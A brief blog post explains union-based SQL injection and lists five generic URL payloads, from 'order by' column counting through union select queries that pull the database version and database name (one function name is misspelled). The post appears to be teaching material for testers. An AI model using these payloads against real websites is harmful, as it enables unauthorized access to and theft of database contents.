top of page
Writer's pictureprashant singh

Union SQL Injection

Updated: Jun 2, 2018



In this attacker uses the UNION Statement for the attack which merges the two or more selected statement for retrieving the data from the database.

                                                                OR

UNION-based attacks allow the tester to easily extract information from the database. Using this extract the table name and number of column after that extract the data from the cell.

1. url/order by 1

2. url union select 1,2,3,4,5….

3. url id=-1 union select 1,2,3,4,5….

4. url id=-49 union select 1,2,@@ version,4,5,6

5. url id=-49 union select 1,2, group_concate(database()),4,5,6

21 views0 comments

Recent Posts

See All

Comments


bottom of page